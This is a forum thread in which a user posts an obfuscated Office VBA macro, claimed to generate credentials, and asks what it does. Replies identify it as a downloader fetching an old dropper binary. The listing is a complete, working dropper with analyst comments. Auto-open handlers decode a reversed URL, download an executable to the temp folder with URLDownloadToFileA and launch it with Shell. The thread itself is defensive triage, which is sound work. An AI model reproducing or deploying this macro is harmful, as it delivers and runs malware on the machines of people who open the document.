


WTF is this

Discussion on WTF is this within the General Coding forum part of the Coders Den category.

Closed Thread
 
Old   #1
 
elite*gold: 0
Join Date: Sep 2011
Posts: 270
Received Thanks: 44
WTF is this

Could someone explain to me what the hell this is?


Code:
'zFFBhAywllRgYLnoyKnKmCEyXDmEJs

'YhbETcJPctoxcTJ
'HRAgYsJHKEVuoDioyKnKmCEyXDmEJsHRAgYsJHKEVuoDi


' Win32 API imports, declared twice: with PtrSafe for VBA7 hosts and without it for older hosts.
' Only sJHTZIrjjbBUYp (urlmon!URLDownloadToFileA) is called in the visible listing. The kernel32
' declarations are not referenced anywhere visible and all share one copy-pasted five-argument
' signature (GetLastError, for example, takes no arguments), so they appear to be padding meant
' to bury the single import that matters.
' Triage note: a Declare of URLDownloadToFileA inside a document macro, combined with Shell and
' auto-open handlers, is a strong downloader indicator no matter how the identifiers are renamed.
#If VBA7 Then
Private Declare PtrSafe Function JTibarHrdvYVZVR Lib "kernel32" Alias "ExecuteUmsThread" (ByVal ROYynJVXcQsuKiGMDbSYnftqLuMOTJ As Long, ByVal ROYynJVXcQsuKiGMDbSYnftqLuMOTJ As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafy As Long, ByVal tltjGHRXhSZrSb As Long) As Long
Private Declare PtrSafe Function tNyYXhiAFHhZRg Lib "kernel32" Alias "TermsrvDeleteKey" (ByVal ROYynJVXcQsuKiG As Long, ByVal ROYynJVXcQsuKiG As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafy As Long, ByVal tltjGHRXhSZrSb As Long) As Long
Private Declare PtrSafe Function gDVQxUoYzCjMTxD Lib "kernel32" Alias "NlsGetCacheUpdateCount" (ByVal ROYynJVXcQsuKiG As Long, ByVal ROYynJVXcQsuKiGMDbSYnftqLuMOTJ As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafy As Long, ByVal tltjGHRXhSZrSb As Long) As Long
Private Declare PtrSafe Function SLHbwHjIWmzUhip Lib "kernel32" Alias "SetComputerNameA" (ByVal ROYynJVXcQsuKiG As Long, ByVal ROYynJVXcQsuKiGMDbSYnftqLuMOTJ As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafy As Long, ByVal tltjGHRXhSZrSb As Long) As Long
Private Declare PtrSafe Function eizmBWkygKARsoh Lib "kernel32" Alias "DosFileHandleToWin32Handle" (ByVal ROYynJVXcQsuKiG As Long, ByVal ROYynJVXcQsuKiG As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafy As Long, ByVal tltjGHRXhSZrSb As Long) As Long
Private Declare PtrSafe Function UqbmgFHhnUZRkcJ Lib "kernel32" Alias "uaw_wcslen" (ByVal ROYynJVXcQsuKiG As Long, ByVal ROYynJVXcQsuKiG As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafyMDbSYnftqLuMOTJ As Long, ByVal tltjGHRXhSZrSb As Long) As Long
Private Declare PtrSafe Function jVZYCQGjMRZiSFI Lib "kernel32" Alias "QueryIdleProcessorCycleTime" (ByVal ROYynJVXcQsuKiGkgFgFpjtlINQFBn As Long, ByVal ROYynJVXcQsuKiG As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafy As Long, ByVal tltjGHRXhSZrSb As Long) As Long
' The one import the macro actually uses (VBA7 variant): downloads a URL to a local file.
Private Declare PtrSafe Function sJHTZIrjjbBUYp Lib "urlmon" Alias "URLDownloadToFileA" (ByVal JxdCDRaNebsfgXLkgFgFpjtlINQFBn As Long, ByVal gaIQkTeNYYLjYGq As String, ByVal kgFgFpjtlINQFBnMDbSYnftqLuMOTJ As String, ByVal pmkorfc As Long, ByVal plkmdirfv As Long) As Long
Private Declare PtrSafe Function vhTCTfnaYzjdBZC Lib "kernel32" Alias "RegQueryInfoKeyA" (ByVal ROYynJVXcQsuKiG As Long, ByVal ROYynJVXcQsuKiG As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafy As Long, ByVal tltjGHRXhSZrSb As Long) As Long
Private Declare PtrSafe Function dYBGNWPziVIPQCj Lib "kernel32" Alias "GetLastError" (ByVal ROYynJVXcQsuKiG As Long, ByVal ROYynJVXcQsuKiG As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafy As Long, ByVal tltjGHRXhSZrSb As Long) As Long
#Else
Private Declare Function JTibarHrdvYVZVR Lib "kernel32" Alias "ExecuteUmsThread" (ByVal ROYynJVXcQsuKiG As Long, ByVal ROYynJVXcQsuKiGMDbSYnftqLuMOTJ As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafy As Long, ByVal tltjGHRXhSZrSb As Long) As Long
Private Declare Function tNyYXhiAFHhZRg Lib "kernel32" Alias "TermsrvDeleteKey" (ByVal ROYynJVXcQsuKiG As Long, ByVal ROYynJVXcQsuKiG As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafy As Long, ByVal tltjGHRXhSZrSb As Long) As Long
Private Declare Function gDVQxUoYzCjMTxD Lib "kernel32" Alias "NlsGetCacheUpdateCount" (ByVal ROYynJVXcQsuKiG As Long, ByVal ROYynJVXcQsuKiG As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafyMDbSYnftqLuMOTJ As Long, ByVal tltjGHRXhSZrSb As Long) As Long
Private Declare Function SLHbwHjIWmzUhip Lib "kernel32" Alias "SetComputerNameA" (ByVal ROYynJVXcQsuKiGMDbSYnftqLuMOTJ As Long, ByVal ROYynJVXcQsuKiG As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafy As Long, ByVal tltjGHRXhSZrSbMDbSYnftqLuMOTJ As Long) As Long
Private Declare Function eizmBWkygKARsoh Lib "kernel32" Alias "DosFileHandleToWin32Handle" (ByVal ROYynJVXcQsuKiG As Long, ByVal ROYynJVXcQsuKiGMDbSYnftqLuMOTJ As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafy As Long, ByVal tltjGHRXhSZrSb As Long) As Long
' The one import the macro actually uses (pre-VBA7 variant): downloads a URL to a local file.
Private Declare Function sJHTZIrjjbBUYp Lib "urlmon" Alias "URLDownloadToFileA" (ByVal vLOdwEFwafDnIbw As Long, ByVal dpdorjn As String, ByVal rdftemwe As String, ByVal xplmcdy As Long, ByVal eumwxwB As Long) As Long
Private Declare Function UqbmgFHhnUZRkcJ Lib "kernel32" Alias "uaw_wcslen" (ByVal ROYynJVXcQsuKiG As Long, ByVal ROYynJVXcQsuKiG As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafy As Long, ByVal tltjGHRXhSZrSb As Long) As Long
Private Declare Function jVZYCQGjMRZiSFI Lib "kernel32" Alias "QueryIdleProcessorCycleTime" (ByVal ROYynJVXcQsuKiG As Long, ByVal ROYynJVXcQsuKiGMDbSYnftqLuMOTJ As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafy As Long, ByVal tltjGHRXhSZrSb As Long) As Long
Private Declare Function vhTCTfnaYzjdBZC Lib "kernel32" Alias "GetLastError" (ByVal ROYynJVXcQsuKiGMDbSYnftqLuMOTJ As Long, ByVal ROYynJVXcQsuKiG As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafyMDbSYnftqLuMOTJ As Long, ByVal tltjGHRXhSZrSbMDbSYnftqLuMOTJ As Long) As Long
#End If

' Filler routine: assigns a random string to an undeclared variable and does nothing else.
' Nothing in the visible listing calls it, so it can be ignored during analysis.
Private Sub wszKXDPkxrXLoWh()
QhmRMKLkFEYXdnU = "mRhSfNkyegBMpP"
End Sub
' Download wrapper: fetches the URL in bohfkYHcsSmRypP and writes it to the local path in
' KpNPSPEzzcDEpEv via URLDownloadToFileA (declared above as sJHTZIrjjbBUYp).
' The function assigns no return value and discards the API's result, so the caller cannot
' tell whether the download succeeded.
Function sxAbpheDixNfjMi(ByVal bohfkYHcsSmRypP As String, ByVal KpNPSPEzzcDEpEv As String)
' Junk branch: PdwMOlUSjYZJDve is never assigned in the visible code, so the comparison
' with this literal is not expected to be true.
If PdwMOlUSjYZJDve = "mYptUoNfGKYpOiX" Then
dNCZZWvBkfROnQk = "FIlvLVSNrrandHU"
'FIlvLVSNrrandHU = "PdwMOlUSjYZJDveFIlvLVSNrrandHU"
End If
' The arithmetic is constant obfuscation: 0 + 2 + 2 - 4, 0 + 0 and 4 - 4 all evaluate to 0,
' so this is URLDownloadToFileA(0, url, path, 0, 0).
sJHTZIrjjbBUYp 0 + 2 + 2 - 4, bohfkYHcsSmRypP, KpNPSPEzzcDEpEv, 0 + 0, 4 - 4
'rKQeVikQmQxHoyy=EEvpNwavWLbZEOd
End Function
' Excel auto-run macro name: runs when the workbook is opened with macros enabled and
' hands control straight to the downloader routine fJcsnuRFbMbAWqL.
Sub Auto_Open()
fJcsnuRFbMbAWqL
End Sub
' Word auto-run macro name: runs when the document is opened with macros enabled.
' Having both Word and Excel entry points lets the same module fire in either host.
Sub AutoOpen()
fJcsnuRFbMbAWqL
End Sub
' String de-obfuscator: returns its argument reversed (StrReverse). The URL and file name
' are stored backwards in the module so they do not appear as plain strings.
' The first and last statements only shuffle unassigned variables and have no effect
' on the returned value.
Private Function eMuOewCUhqUazqc(IEldtrDuGlkTjRT)
pkvkfkwruDSKyXdFIlvLVSNrrandHU = vQNuqEpwzAzoWuv
  eMuOewCUhqUazqc = StrReverse(IEldtrDuGlkTjRT)
If pkvkfkwruDSKyXd = vQNuqEpwzAzoWuvFIlvLVSNrrandHU Then vQNuqEpwzAzoWuv = OjEnDLxzLiRxGol
End Function
' Core downloader routine, reached from Auto_Open, AutoOpen and Workbook_Open.
' It decodes a URL and a temp-file path, downloads the URL to that path, then runs the file.
' Nothing here generates a username or password; every other assignment and If block in
' the routine is filler.
Private Sub fJcsnuRFbMbAWqL()
IVrmWSZgkUIOwZ = RIQWyisqGzGHpy
' Chr() codes spell "exe.zbxrlz/tac.fmop.a//:sptth"; reversed by eMuOewCUhqUazqc this is the
' download URL (defanged IoC: hxxps://a[.]pomf[.]cat/zlrxbz[.]exe).
fEdbtuhFCrgIXL = eMuOewCUhqUazqc(Chr(101) + Chr(120) + Chr(101) + Chr(46) + Chr(122) + Chr(98) + Chr(120) + Chr(114) + Chr(108) + Chr(122) + Chr(47) + Chr(116) + Chr(97) + Chr(99) + Chr(46) + Chr(102) + Chr(109) + Chr(111) + Chr(112) + Chr(46) + Chr(97) + Chr(47) + Chr(47) + Chr(58) + Chr(115) + Chr(112) + Chr(116) + Chr(116) + Chr(104))
If zMNdXbbdNuJUbEu = "DcJZgxAGXUDDlmr" Then
jtVjkqpGpcysKoD = "YbcoZcZQEYswNAK"
snCvChKElHVeGaj = "FCeTWupgQhizbNM"
End If
' Reversed literal: the dropped file name is "ezwwxvvr.cpvl".
ZjJyWaHzvkqXNmr = eMuOewCUhqUazqc("lvpc.rvvxwwze")
' The arithmetic yields Chr(84), Chr(77), Chr(80) = "TMP" and Chr(92) = "\", so the target
' path is %TMP%\ezwwxvvr.cpvl (host IoC: a file with this name in the user's temp directory).
clQJsXVNmotrVpy = Environ$(Chr(20# + 20# + 30# + 14# + 500# - 500# + 200 - 200) + Chr(80# - 3 + 1# - 1# + 1000# - 1000#) + Chr(40 + 30 + 5 + 5 + 1 + 1 - 2)) + Chr(100# - 8# - 2# + 2#) & ZjJyWaHzvkqXNmr
If pquAZkgqTYOLNqc = "sOGjTHbiIwwUOro" Then
qdeyujadPFejHEM = "dTBpTWfAJNOBjj"
End If
PbnASKbkgjcWPUV = "bygMYYbaqHeSabO"
SGHLCIzJxRDTSPp = "vGPNCFVxBLIntIx"
snCvChKElHVeGaj = "FCeTWupgQhizbNM"
' Download step: URL -> temp path, via the URLDownloadToFileA wrapper.
sxAbpheDixNfjMi fEdbtuhFCrgIXL, clQJsXVNmotrVpy
' Execution step: the downloaded file is launched directly from the Office process.
' An Office application writing a file to %TMP% and then spawning it as a child process
' is the behaviour endpoint monitoring should flag for this sample.
Call Shell(clQJsXVNmotrVpy, vbNormalFocus)
End Sub
' Excel Workbook Open event handler name: a third auto-run entry point into the same
' downloader routine when the workbook is opened with macros enabled.
Sub Workbook_Open()
fJcsnuRFbMbAWqL
End Sub
That "should" generate a username and a password, but I don't trust it.
md88 is offline  
Old 07/13/2016, 00:24   #2
 
elite*gold: 0
Join Date: May 2015
Posts: 700
Received Thanks: 444
It downloads and executes a binary.

Edit: This is the file it downloads:
Code:
-deleted
Edit:
I wouldn't run it anyway. There is no reason to write such cryptic code if it wasn't a virus ...
algernong is offline  
Old 07/13/2016, 01:13   #3
 
elite*gold: 100
Join Date: Apr 2008
Posts: 860
Received Thanks: 1,487
Quote:
Originally Posted by algernong View Post
Edit: This is the file it downloads:
Code:
-deleted
[...]
I wouldn't run it anyway. There is no reason to write such cryptic code if it wasn't a virus ...
This binary identifies as "wextract", a malware-dropper from 2008. Somebody really put some effort into undetecting this old piece. ;D
florian0 is offline  
Old 07/13/2016, 09:02   #4
 
elite*gold: 0
Join Date: Sep 2011
Posts: 270
Received Thanks: 44
Okay, ty guys
md88 is offline  
Old 07/13/2016, 10:39   #5
dotCom
 
 
elite*gold: 9842
The Black Market: 107/0/0
Join Date: Mar 2009
Posts: 16,855
Received Thanks: 4,681
#closed - problem solved + DL deleted
Devsome is offline  